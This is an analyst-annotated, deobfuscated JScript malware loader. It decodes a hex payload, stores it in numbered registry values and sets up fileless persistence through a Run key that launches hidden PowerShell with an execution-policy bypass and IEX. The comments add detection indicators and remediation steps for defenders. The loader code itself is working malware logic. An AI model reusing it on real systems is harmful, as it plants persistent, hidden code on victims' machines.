<#
Analyst annotation of a WSH/JScript loader (deobfuscated sample). It decodes a
hex-encoded second stage, stores it in the registry in chunks, and registers a
PowerShell command that reassembles and executes it at logon (fileless persistence).
Defender-relevant artifacts created by this script are called out inline.
#>
<#
Obfuscated payload (the next stage, containing the PE):
#>
var obf_data1 = 'B323232323230237D202075656C635D2[...]';
<#
initialize:
(COM objects used below: Shell.Application for ShellExecute, Scripting.FileSystemObject for FolderExists)
#>
shell_app = WScript.CreateObject("shell.application");
fs_obj = new ActiveXObject("Scripting.FileSystemObject");
<#
decode the obfuscated content:
step 1: reverse the string; step 2: treat each pair of characters as a hex byte
and append the corresponding character. The result (stage3) is the plaintext next stage.
#>
var stage2 = obf_data1.split("").reverse().join("");
stage3 = '';
for (i = 0; i < (stage2.length / 2); i++) {
stage3 += String.fromCharCode('0x' + stage2.substr(i * 2, 2));
}
var shell_obj = WScript.CreateObject("WScript.Shell");
<#
create the name of the key based on the Machine Guid:
dashes and digits are stripped, "A" is prefixed, then lower-cased, so the name is
letters only and stable per host. The same name is reused for the HKCU\SOFTWARE
subkey, the HKCU\Environment value, and the Run value below, which makes the three
artifacts easy to correlate during triage.
#>
machine_guid = shell_obj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid");
var pattern = /\-|[0-9]/g;
machine_guid = "A" + machine_guid.replace(pattern, "");
my_key = machine_guid.toLowerCase();
is_fresh = 0;
<#
check if the key already exist:
RegRead throws when the key is absent; the catch branch creates it and marks this
run as the first infection. On a re-run the key exists, so everything below is skipped.
#>
try {
shell_obj.RegRead("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\");
} catch (err) {
is_fresh = 1;
shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\", "", "REG_SZ");
}
if (is_fresh == 1) {
<#
Divide the content on chunks and store it in form of registry keys:
values named "0", "1", "2", ... each hold 4000 characters of stage3 as REG_SZ.
Detection: a new HKCU\SOFTWARE subkey populated with many numbered 4000-char string values.
#>
chunk = '';
counter = 0;
for (var i = 0; i <= stage3.length - 1; i++) {
chunk = chunk + stage3.substring(i, i + 1);
if (chunk.length == 4000) {
shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\" + counter, chunk, "REG_SZ");
counter = counter + 1;
chunk = '';
}
}
<#
Write the last chunk:
note that counter is incremented before the write, so the final value's index skips
one number; the PowerShell reader below tolerates the gap with its Try/Catch.
#>
if (chunk.length > 0) {
counter = counter + 1;
shell_obj.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\" + my_key + "\\" + counter, chunk, "REG_SZ");
}
<#
Fetch the PowerShell path:
the 32-bit host is chosen when "Program Files (x86)" exists (i.e. on 64-bit Windows).
#>
if (fs_obj.FolderExists("C:\\Program Files (x86)")) {
var powershell_path = 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe';
} else {
var powershell_path = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe';
}
<#
Save the command for reading the saved keys one by one:
ps_cmd1 iterates value names 0..500 under HKCU:\SOFTWARE\<key>, concatenates them and
passes the result to IEX. It is stored as a user environment variable (REG_EXPAND_SZ
under HKCU\Environment) rather than on disk.
Detection: a REG_EXPAND_SZ value under HKCU\Environment whose data contains
"Get-ItemProperty" and "IEX" is a strong indicator.
#>
ps_cmd1 = 'for ($i=0;$i -le 500;$i++){Try{$abc=$abc+(Get-ItemProperty -path \'HKCU:\\SOFTWARE\\' + my_key + '\').$i}Catch{}}IEX($abc)';
shell_obj.RegWrite("HKEY_CURRENT_USER\\Environment\\" + my_key, ps_cmd1, "REG_EXPAND_SZ");
ps_cmd2 = '-ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable(\'' + my_key + '\', \'User\'))"';
<#
Add the Run key for (fileless) persistence:
the Run value launches powershell.exe with -ExecutionPolicy Bypass -windowstyle hidden
and an IEX of the environment variable written above; no script file touches disk.
Detection: Run values whose command line contains "-ExecutionPolicy Bypass" and
"GetEnvironmentVariable" / "IEX".
Remediation: delete the Run value, the HKCU\Environment value and the HKCU\SOFTWARE\<key>
subkey together; leaving any one of them allows the chain to be rebuilt.
#>
shell_obj.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + my_key, powershell_path + ' ' + ps_cmd2, "REG_SZ");
<#
Run the same powershell command immediately (as in the case of persistence):
the trailing 0 is the window-show argument, so no console is displayed.
Detection: wscript.exe/cscript.exe spawning powershell.exe with the arguments above.
#>
shell_app.ShellExecute(powershell_path, ps_cmd2, "", "open", 0);
}